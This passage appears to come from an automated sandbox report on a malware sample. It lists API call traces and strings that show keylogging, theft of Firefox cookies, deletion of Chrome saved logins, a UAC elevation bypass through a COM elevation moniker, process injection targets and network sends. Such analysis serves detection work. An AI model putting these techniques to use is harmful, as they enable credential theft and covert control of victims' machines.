                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                            • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                              • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                              • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                            • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$`.S$ieinstal.exe$ielowutil.exe
                            • API String ID: 3756808967-2460292970
                            • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                            • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                            • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                            • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                            APIs
                            • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                            • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                            • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                            • CloseHandle.KERNEL32(00000000), ref: 0041349A
                            • CloseHandle.KERNEL32(?), ref: 004134A0
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                            • String ID:
                            • API String ID: 297527592-0
                            • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                            • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                            • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                            • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0$1$2$3$4$5$6$7$VG
                            • API String ID: 0-1861860590
                            • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                            • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                            • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                            • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C37D
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C3AD
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C41F
                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C42C
                              • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C402
                            • GetLastError.KERNEL32(?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C44D
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C463
                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C46A
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C473
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                            • String ID: `.S
                            • API String ID: 2341273852-1324555088
                            • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                            • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                            • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                            • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                            APIs
                            • _wcslen.LIBCMT ref: 0040755C
                            • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Object_wcslen
                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                            • API String ID: 240030777-3166923314
                            • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                            • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                            • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                            • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                            APIs
                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                            • GetLastError.KERNEL32 ref: 0041A84C
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                            • String ID:
                            • API String ID: 3587775597-0
                            • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                            • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                            • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                            • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                            • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                            • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                            • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                            • String ID: JD$JD$JD
                            • API String ID: 745075371-3517165026
                            • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                            • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                            • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                            • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                            • FindClose.KERNEL32(00000000), ref: 0040C4B8
                            • FindClose.KERNEL32(00000000), ref: 0040C4E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$CloseFile$FirstNext
                            • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                            • API String ID: 1164774033-405221262
                            • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                            • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                            • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                            • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                              • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Find$CreateFirstNext
                            • String ID: 8SG$PXG$PXG$NG$PG
                            • API String ID: 341183262-3812160132
                            • Opcode ID: 6f7d9e176dbb922e5901518d2a500cbc9bfb5a1b0f14e37a1c7bedcfbb51ebec
                            • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                            • Opcode Fuzzy Hash: 6f7d9e176dbb922e5901518d2a500cbc9bfb5a1b0f14e37a1c7bedcfbb51ebec
                            • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                            • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                            • GetLastError.KERNEL32 ref: 0040A328
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • GetMessageA.USER32 ref: 0040A376
                            • TranslateMessage.USER32(?), ref: 0040A385
                            • DispatchMessageA.USER32 ref: 0040A390
                            Strings
                            • Keylogger initialization failure: error , xrefs: 0040A33C
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                            • String ID: Keylogger initialization failure: error
                            • API String ID: 3219506041-952744263
                            • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                            • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                            • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                            • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                            • String ID:
                            • API String ID: 1888522110-0
                            • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                            • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                            • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                            • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                            APIs
                            • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                            • RegCloseKey.ADVAPI32(?), ref: 004140E4
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                            • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressCloseCreateLibraryLoadProcsend
                            • String ID: SHDeleteKeyW$Shlwapi.dll
                            • API String ID: 2127411465-314212984
                            • Opcode ID: feda3c0cb2e05dbf246105b527e356fbe40292db3182a56c896b5e0f635c8d19
                            • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                            • Opcode Fuzzy Hash: feda3c0cb2e05dbf246105b527e356fbe40292db3182a56c896b5e0f635c8d19
                            • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                            APIs
                            • _free.LIBCMT ref: 00449292
                            • _free.LIBCMT ref: 004492B6
                            • _free.LIBCMT ref: 0044943D
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                            • _free.LIBCMT ref: 00449609
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                            • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                            • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                            • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                            APIs
                              • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                              • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                              • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                              • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                              • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                            • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                            • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                            • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                            • String ID: !D@$PowrProf.dll$SetSuspendState
                            • API String ID: 1589313981-2876530381
                            • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                            • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                            • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                            • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                            • GetLastError.KERNEL32 ref: 0040BA93
                            Strings
                            • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                            • UserProfile, xrefs: 0040BA59
                            • [Chrome StoredLogins not found], xrefs: 0040BAAD
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            • API String ID: 2018770650-1062637481
                            • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                            • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                            • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                            • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                            • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                            • GetLastError.KERNEL32 ref: 004179D8
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3534403312-3733053543
                            • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                            • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                            • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                            • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                            APIs
                            • __EH_prolog.LIBCMT ref: 00409293
                              • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,020F4950,00000010), ref: 004048E0
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                            • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                            • FindClose.KERNEL32(00000000), ref: 004093FC
                              • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                              • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                              • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                            • FindClose.KERNEL32(00000000), ref: 004095F4
                              • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                              • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                            • String ID:
                            • API String ID: 1824512719-0
                            • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                            • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                            • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                            • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ManagerStart
                            • String ID:
                            • API String ID: 276877138-0
                            • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                            • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                            • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                            • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                            APIs
                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                            • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                            Strings
                            Memory Dump Source
